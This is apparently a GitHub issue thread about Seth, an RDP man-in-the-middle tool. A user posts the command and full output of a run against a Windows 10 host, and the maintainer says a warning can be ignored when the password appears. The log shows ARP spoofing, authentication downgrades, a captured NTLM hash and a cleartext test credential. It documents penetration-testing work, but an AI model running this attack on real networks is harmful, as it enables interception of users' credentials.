AdrianVollmer
commented
3 years ago Hey there, it's just a warning. You can ignore it, especially if the password appears in the output, which means the attack was successful.
Closed alovinaX closed 3 years ago
AdrianVollmer
commented
3 years ago Hey there, it's just a warning. You can ignore it, especially if the password appears in the output, which means the attack was successful.
I use ubuntu 18.04 my target is windows 10 64bit when I run the script by the following command I got those errors:
./seth.sh eth1 192.168.10.{59,57,10} calc
███████╗███████╗████████╗██╗ ██╗ ██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer ███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de ╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017 ███████║███████╗ ██║ ██║ ██║ https://www.syss.de ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ [] Linux OS detected, using iptables as the netfilter interpreter [] Spoofing arp replies... [] Turning on IP forwarding... [] Set iptables rules for SYN packets... [] Waiting for a SYN packet to the original destination... [+] Got it! Original destination is 192.168.10.10 [] Clone the x509 certificate of the original destination... [] Adjust iptables rules for all packets... [] Run RDP proxy... Listening for new connection Connection received from 192.168.10.57:49802 Warning: RC4 not available on client, attack might not work Listening for new connection Downgrading authentication options from 11 to 3 Enable SSL test::DESKTOP-V50VN9K:b6f9cc86441228f9:bea6860fecda0cd86cd5b23b4216b602:010100000000000022972acf6b8ad60193e25ae7f86e77d20000000002001e00570049004e002d003700370032004400320052003600470033005300370001001e00570049004e002d003700370032004400320052003600470033005300370004001e00570049004e002d003700370032004400320052003600470033005300370003001e00570049004e002d00370037003200440032005200360047003300530037000700080022972acf6b8ad601060004000200000008003000300000000000000001000000002000002ebd4ef70e6bb9b6b73d66d1da7808e5aba82dc2bcb98547d30c8db0de025fdc0a0010000000000000000000000000000000000009002a005400450052004d005300520056002f003100390032002e003100360038002e00310030002e0031003000000000000000000000000000 Tamper with NTLM response Downgrading CredSSP Connection lost ([Errno 104] Connection reset by peer) Connection received from 192.168.10.57:49809 Warning: RC4 not available on client, attack might not work Listening for new connection Server enforces NLA; switching to 'fake server' mode Enable SSL Connection lost on enableSSL: [Errno 104] Connection reset by peer Connection lost on run_fake_server Connection received from 192.168.10.57:49810 Warning: RC4 not available on client, attack might not work Listening for new connection Enable SSL 'NoneType' object has no attribute 'getsockopt' Hiding forged protocol request from client .\test:test123 [] Cleaning up... [] Done